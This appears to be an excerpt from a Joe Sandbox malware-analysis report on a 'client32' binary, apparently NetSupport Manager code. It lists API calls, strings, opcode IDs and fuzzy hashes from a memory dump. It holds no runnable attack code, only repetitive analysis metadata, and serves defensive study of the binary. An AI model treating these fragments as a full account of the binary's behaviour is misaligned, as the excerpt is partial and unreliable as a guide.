                                                                                        • Opcode ID: 2bc1dfb5218c02c431ab83e71b2dcb76f085101561c9e5be1cea2ac4dddf3c12
                                                                                        • Instruction ID: 4133adfa845279c2267cfda8ab6a139ff56e83a68c49f32f67e71b8829282469
                                                                                        • Opcode Fuzzy Hash: 2bc1dfb5218c02c431ab83e71b2dcb76f085101561c9e5be1cea2ac4dddf3c12
                                                                                        • Instruction Fuzzy Hash: E5119675740614AFE720DB68CC81FDAB7E8EF48704F004588F6089B280DBB1FA41CB95
                                                                                        APIs
                                                                                        • RegQueryValueExA.ADVAPI32 ref: 110ED600
                                                                                          • Part of subcall function 110ED2B0: wvsprintfA.USER32(?,00020019,?), ref: 110ED2DB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: QueryValuewvsprintf
                                                                                        • String ID: ($Error %d getting %s
                                                                                        • API String ID: 141982866-3697087921
                                                                                        • Opcode ID: ca51b0748ce67095b74e5d633593de675965d03fe984162ec59bedaca66226cf
                                                                                        • Instruction ID: 957b37bb43794c395efd3ecf64b5ca03ad7d4ce898e6801f907036c689cda8f8
                                                                                        • Opcode Fuzzy Hash: ca51b0748ce67095b74e5d633593de675965d03fe984162ec59bedaca66226cf
                                                                                        • Instruction Fuzzy Hash: BC11C672E01108AFDB10DEADDD45DEEB3BCEF99614F00816EF815D7244EA71A914CBA1
                                                                                        APIs
                                                                                        Strings
                                                                                        • Error Code Sent to Tutor is %d, xrefs: 1110B575
                                                                                        • Error code %d not sent to Tutor, xrefs: 1110B5E8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _memset
                                                                                        • String ID: Error Code Sent to Tutor is %d$Error code %d not sent to Tutor
                                                                                        • API String ID: 2102423945-1777407139
                                                                                        • Opcode ID: cb457852222b3d9b2bd104c4c917ff69952e9b88395c3a1b0ae6dfef815d539e
                                                                                        • Instruction ID: b43b366142eeca4acab724c68f0e90673ee899940c55183fb17260b92f7d2313
                                                                                        • Opcode Fuzzy Hash: cb457852222b3d9b2bd104c4c917ff69952e9b88395c3a1b0ae6dfef815d539e
                                                                                        • Instruction Fuzzy Hash: 0911A07AA4111CABDB10DFA4CD51FEAF77CEF55308F1041DAEA085B240DA72AA14CBA5
                                                                                        Strings
                                                                                        • Error. preventing capbuf overflow, xrefs: 1100B6C6
                                                                                        • Error. NULL capbuf, xrefs: 1100B6A1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Error. NULL capbuf$Error. preventing capbuf overflow
                                                                                        • API String ID: 0-3856134272
                                                                                        • Opcode ID: a723116aa68a4b999a3597d1cc0fccb57ed2d6ff5a333340ea9ad9601b026ece
                                                                                        • Instruction ID: a4a4ce9073261333e851eebcc79e1773aa66005037fae8e918fe6f1657af3004
                                                                                        • Opcode Fuzzy Hash: a723116aa68a4b999a3597d1cc0fccb57ed2d6ff5a333340ea9ad9601b026ece
                                                                                        • Instruction Fuzzy Hash: C401207AA0060997D610CE54EC40ADBB398DB8036CF04483AE65E93501D271B491C6A6
                                                                                        APIs
                                                                                        • GetProcAddress.KERNEL32(00000001,WTSSendMessageA,00000000,?,1113A569,00000000,000000FF,00000000,00000001,00000000,00000001,00000000,0000000A,?,00000000), ref: 1112D6F4
                                                                                        • SetLastError.KERNEL32(00000078,00000000,?,1113A569,00000000,000000FF,00000000,00000001,00000000,00000001,00000000,0000000A,?,00000000), ref: 1112D735
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressErrorLastProc
                                                                                        • String ID: WTSSendMessageA
                                                                                        • API String ID: 199729137-1676301106
                                                                                        • Opcode ID: 7fb74c84802ba5a444731fdd007d56646f6016a01965a233a038b3bb232e74b6
                                                                                        • Instruction ID: 5748faf58fc4c309978bb3964bb976d1af77d24f32d17e8bed4b3b40d6b81985
                                                                                        • Opcode Fuzzy Hash: 7fb74c84802ba5a444731fdd007d56646f6016a01965a233a038b3bb232e74b6
                                                                                        • Instruction Fuzzy Hash: 7E014B72650618AFCB14DF98D880E9BB7E8EF8C721F018219F959D3640C630EC50CBA0
                                                                                        APIs
                                                                                        • wvsprintfA.USER32(?,?,00000000), ref: 110D1572
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                        • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                                        • API String ID: 175691280-2052047905
                                                                                        • Opcode ID: 7c0d153cab71b8fe9f1bfbcba2addb4273ace9702d0da0492f16544c7bd503bd
                                                                                        • Instruction ID: b89aa90761fb3a94205c41d70d04c41302f16292cd1454487622bd2b1eadc16a
                                                                                        • Opcode Fuzzy Hash: 7c0d153cab71b8fe9f1bfbcba2addb4273ace9702d0da0492f16544c7bd503bd
                                                                                        • Instruction Fuzzy Hash: 0EF0A975A0025DABCF00DEE4DC40BFEFBAC9B85208F40419DF945A7240DE706A45C7A5
                                                                                        APIs
                                                                                        • SendMessageA.USER32(00000000,00001006,00000000,?), ref: 1101509D
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        Strings
                                                                                        • m_hWnd, xrefs: 11015049
                                                                                        • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 11015044
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                        • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                        • API String ID: 819365019-3966830984
                                                                                        • Opcode ID: 815180139f2bb1a06bb201446d8668dccf0e5584833ed039e0ec19942fc9e912
                                                                                        • Instruction ID: f09b96a616f6a33d867b0b5af4e6941d1959c252ec7f828cb2a239631c18db6c
                                                                                        • Opcode Fuzzy Hash: 815180139f2bb1a06bb201446d8668dccf0e5584833ed039e0ec19942fc9e912
                                                                                        • Instruction Fuzzy Hash: 1701A2B1D10219AFCB90CFA9C8457DEBBF4AB0C310F10816AE519F6240E67556808F94
                                                                                        APIs
                                                                                        • wvsprintfA.USER32(?,?,1102CC61), ref: 110D15EB
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                        • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                                        • API String ID: 175691280-2052047905
                                                                                        • Opcode ID: 80bf54f75d60de959a569c8df654b715eddbd256bd047d3a81eed0e5ac7c8735
                                                                                        • Instruction ID: d047ce25565584385d90dc1a88bf85935da342945f7d0a1e0c7239cac7a22c38
                                                                                        • Opcode Fuzzy Hash: 80bf54f75d60de959a569c8df654b715eddbd256bd047d3a81eed0e5ac7c8735
                                                                                        • Instruction Fuzzy Hash: 1AF0A475A0025CBBCB00DED4DC40BEEFBA8AB45208F004099F549A7140DE706A55C7A9
                                                                                        APIs
                                                                                        • GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA,00000000,?,1109E6BC,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109D824
                                                                                        • SetLastError.KERNEL32(00000078,00000000,?,1109E6BC,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109D84D
                                                                                        Strings
                                                                                        • ConvertStringSecurityDescriptorToSecurityDescriptorA, xrefs: 1109D81E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressErrorLastProc
                                                                                        • String ID: ConvertStringSecurityDescriptorToSecurityDescriptorA
                                                                                        • API String ID: 199729137-262600717
                                                                                        • Opcode ID: 7111d195e66c423c04a8cdecdaa052cea34c6f9f6774aeedc819551a2fab5bee
                                                                                        • Instruction ID: a7eb98fa6670c8ef5a6ef58352877086b50851194238c89ec414a48c6dd1b06f
                                                                                        • Opcode Fuzzy Hash: 7111d195e66c423c04a8cdecdaa052cea34c6f9f6774aeedc819551a2fab5bee
                                                                                        • Instruction Fuzzy Hash: 2EF05E72A41228AFD724CF94E944A97B7E8EB48710F00491AF95A97640C670E810CBA0
                                                                                        APIs
                                                                                        • SetPropA.USER32(?,?,?), ref: 1115F395
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorExitLastMessageProcessPropwsprintf
                                                                                        • String ID: ..\ctl32\wndclass.cpp$p->m_hWnd
                                                                                        • API String ID: 1134434899-3115850912
                                                                                        • Opcode ID: 538790263cfb1f25c099da663b992418a3413831744957c6e7e8603356e21433
                                                                                        • Instruction ID: 87c86bef28f98f72f88127ca4e69caffea3bfce03f9a6da2004c13aaf4101256
                                                                                        • Opcode Fuzzy Hash: 538790263cfb1f25c099da663b992418a3413831744957c6e7e8603356e21433
                                                                                        • Instruction Fuzzy Hash: FCF0E575BC0336B7D7509A66DC82FE6F358D722BA4F448016FC26A2141F274E980C2D2
                                                                                        APIs
                                                                                        • SendMessageA.USER32(00000000,0000102D,00000000,?), ref: 11015229
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        Strings
                                                                                        • m_hWnd, xrefs: 110151F9
                                                                                        • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 110151F4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                        • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                        • API String ID: 819365019-3966830984
                                                                                        • Opcode ID: bd39cd011623ecfe06393bf57d51be560d8a4fd4800ff0bf8f32089dc2d64717
                                                                                        • Instruction ID: 9699e87d833f238af44183ea9879e136ee952ee53a84507d201ef9d6a93955d8
                                                                                        • Opcode Fuzzy Hash: bd39cd011623ecfe06393bf57d51be560d8a4fd4800ff0bf8f32089dc2d64717
                                                                                        • Instruction Fuzzy Hash: 19F0FEB5D0025DABCB14DF95DC85EDAB7F8EB4D310F00852AFD29A7240E770A950CBA5
                                                                                        APIs
                                                                                        • GetProcAddress.KERNEL32(?,QueueUserWorkItem), ref: 110173E4
                                                                                        • SetLastError.KERNEL32(00000078), ref: 11017409
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressErrorLastProc
                                                                                        • String ID: QueueUserWorkItem
